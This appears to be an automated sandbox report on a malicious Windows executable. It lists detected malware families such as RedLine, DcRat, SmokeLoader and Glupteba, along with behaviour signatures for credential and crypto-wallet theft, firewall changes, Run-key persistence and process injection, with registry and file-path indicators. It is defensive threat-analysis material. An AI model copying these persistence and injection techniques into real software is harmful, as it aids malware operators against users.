Analysis Overview
SHA256
f82c12a792c5887ad406c3355e66f0e9fbfb806d2f6c34c0fb563767ae8731a9
Threat Level: Known bad
The file NEAS.f82c12a792c5887ad406c3355e66f0e9fbfb806d2f6c34c0fb563767ae8731a9.exe was found to be: Known bad.
Malicious Activity Summary
DcRat
SectopRAT payload
SectopRAT
Glupteba
Glupteba payload
SmokeLoader
ZGRat
Mystic
Detect ZGRat V1
RedLine payload
RedLine
Detect Mystic stealer payload
Modifies Windows Firewall
Downloads MZ/PE file
Stops running service(s)
UPX packed file
Executes dropped EXE
Reads user/profile data of web browsers
Checks computer location settings
Checks installed software on the system
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SetThreadContext
Launches sc.exe
Unsigned PE
Enumerates physical storage devices
Program crash
Suspicious use of WriteProcessMemory
Suspicious behavior: MapViewOfSection
Modifies data under HKEY_USERS
Suspicious use of SetWindowsHookEx
Suspicious behavior: EnumeratesProcesses
Uses Task Scheduler COM API
Checks SCSI registry key(s)
Suspicious use of AdjustPrivilegeToken
Creates scheduled task(s)
Suspicious behavior: GetForegroundWindowSpam
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-11-11 10:20
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2023-11-11 10:20
Reported
2023-11-11 10:23
Platform
win10v2004-20231025-en
Max time kernel
87s
Max time network
155s
Command Line
Signatures
DcRat
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\NEAS.f82c12a792c5887ad406c3355e66f0e9fbfb806d2f6c34c0fb563767ae8731a9.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
Detect Mystic stealer payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Glupteba
Glupteba payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Mystic
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
SmokeLoader
ZGRat
Downloads MZ/PE file
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Stops running service(s)
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7Sj7cv98.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\3C5A.exe | N/A |
Executes dropped EXE
Reads user/profile data of web browsers
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\NEAS.f82c12a792c5887ad406c3355e66f0e9fbfb806d2f6c34c0fb563767ae8731a9.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\It1tN66.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\XT4Xf57.exe | N/A |
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1956 set thread context of 4568 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1Bh35nV3.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
| PID 1564 set thread context of 5060 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6Xv2IQ3.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
| PID 4356 set thread context of 1980 | N/A | C:\Users\Admin\AppData\Local\Temp\48FE.exe | C:\Users\Admin\AppData\Local\Temp\48FE.exe |
| PID 4008 set thread context of 3624 | N/A | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2xc9261.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2xc9261.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2xc9261.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-371 = "Jerusalem Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-441 = "Arabian Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1821 = "Russia TZ 1 Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1502 = "Turkey Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-661 = "Cen. Australia Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-511 = "Central Asia Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2341 = "Haiti Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-431 = "Iran Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-302 = "Romance Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2161 = "Altai Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2342 = "Haiti Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-531 = "Sri Lanka Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-392 = "Arab Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2492 = "Aus Central W. Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-262 = "GMT Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2491 = "Aus Central W. Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-621 = "Korea Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2411 = "Marquesas Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2042 = "Eastern Standard Time (Mexico)" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2452 = "Saint Pierre Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-932 = "Coordinated Universal Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1972 = "Belarus Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1932 = "Russia TZ 11 Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-791 = "SA Western Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-105 = "Central Brazilian Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2871 = "Magallanes Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1911 = "Russia TZ 10 Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-161 = "Central Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-742 = "New Zealand Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-512 = "Central Asia Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2142 = "Transbaikal Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-181 = "Mountain Daylight Time (Mexico)" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-132 = "US Eastern Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1721 = "Libya Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2062 = "North Korea Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1412 = "Syria Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-401 = "Arabic Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-341 = "Egypt Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-335 = "Jordan Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-191 = "Mountain Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2xc9261.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2xc9261.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2xc9261.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
